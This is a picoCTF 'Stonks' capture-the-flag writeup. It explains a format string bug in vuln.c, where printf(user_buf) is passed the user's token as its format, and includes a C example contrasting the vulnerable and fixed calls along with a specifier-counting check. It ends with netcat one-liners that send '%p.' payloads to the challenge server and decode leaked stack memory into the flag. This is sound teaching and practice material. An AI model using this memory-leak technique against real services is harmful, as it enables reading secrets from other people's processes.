picoCTF Stonks writeup

0x0021h
Nov 21, 2021

Compile and run it:

gcc vuln.c

If the flag is not found locally, it must be on the remote server.

python3 -c 'print("A" * 200)' > api

Feeding the program this 200-byte token works fine.

char *user_buf = malloc(300 + 1); // Allocates memory for the token
printf("What is your API token?\n"); // Prints the input prompt
scanf("%300s", user_buf); // Reads the user input (at most 300 bytes) into user_buf
printf("Buying stonks with token:\n"); // Prints info
printf(user_buf); // Outputs user_buf directly as the format string [VULNERABLE!!]

As we can see, no format string is passed to printf; the user input itself is used as the format string.

printf(user_buf) will therefore interpret any format specifiers contained in the token.
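The following is an added example, not code from the writeup or from the challenge source: it places the vulnerable pattern from vuln.c next to its hardened form so the difference is visible in output, and adds a small check a defender can use to reject or flag tokens that carry conversion specifiers. The helper names (vformat, echo_token_unsafe, echo_token_safe, count_format_directives) and the sample tokens are assumptions made for this example.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Thin va_list wrapper so the "format string comes from the user" path can
   be built even where the compiler defaults to -Werror=format-security.
   Hypothetical helper, not part of the challenge binary. */
static int vformat(char *out, size_t n, const char *fmt, ...) {
    va_list ap;
    va_start(ap, fmt);
    int written = vsnprintf(out, n, fmt, ap);
    va_end(ap);
    return written;
}

/* Vulnerable pattern from vuln.c: the token IS the format string, so any
   %p / %x / %s / %n directive inside it is interpreted by printf.
   Renders into out and returns 1 only if the output still equals the token. */
static int echo_token_unsafe(const char *token, char *out, size_t n) {
    vformat(out, n, token);            /* mirrors printf(user_buf) */
    return strcmp(out, token) == 0;
}

/* Hardened form: a literal format string; the token is only ever data. */
static int echo_token_safe(const char *token, char *out, size_t n) {
    snprintf(out, n, "%s", token);     /* mirrors printf("%s", user_buf) */
    return strcmp(out, token) == 0;
}

/* Input-validation / detection helper: count conversion specifiers in a
   token. A genuine API token has no reason to contain one, so a non-zero
   count can be rejected at the prompt and flagged in logs. "%%" is a
   literal percent sign and is not counted. */
static int count_format_directives(const char *s) {
    int count = 0;
    for (; *s; s++) {
        if (*s != '%') continue;
        if (s[1] == '%') { s++; continue; }   /* escaped percent, skip pair */
        count++;
    }
    return count;
}

int main(void) {
    /* Constructed sample tokens, not taken from the challenge. */
    const char *benign = "AAAAAAAAAAAAAAAA";
    const char *probe  = "%p.%p";
    char buf[256];

    printf("benign token, unsafe path echoed literally: %d\n",
           echo_token_unsafe(benign, buf, sizeof buf));
    printf("probe  token, unsafe path echoed literally: %d (got \"%s\")\n",
           echo_token_unsafe(probe, buf, sizeof buf), buf);
    printf("probe  token, safe   path echoed literally: %d (got \"%s\")\n",
           echo_token_safe(probe, buf, sizeof buf), buf);
    printf("directives in probe: %d, in benign: %d\n",
           count_format_directives(probe), count_format_directives(benign));
    return 0;
}
```

On the unsafe path the probe token comes back as two hexadecimal stack or register values joined by a dot, exactly the leak the writeup exploits; on the safe path it comes back as the literal text "%p.%p". The one-line fix for vuln.c is the `"%s"` format in echo_token_safe; the directive counter is a defence-in-depth check that is also cheap to apply to logged tokens.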

Remote Attack:

python3 -c 'print("1\n" + "%p." * 50)' | nc mercury.picoctf.net 33411 | tr "." "\n" | xxd -r -p | strings -n1
python3 -c 'print("1\n" + "%p." * 50)' | nc mercury.picoctf.net 33411 | tr "." "\n" | while read line; do echo $line | xxd -r -p | strings -n1 | rev; done | tr -d "\n" | grep -oE "picoCTF{.*}"
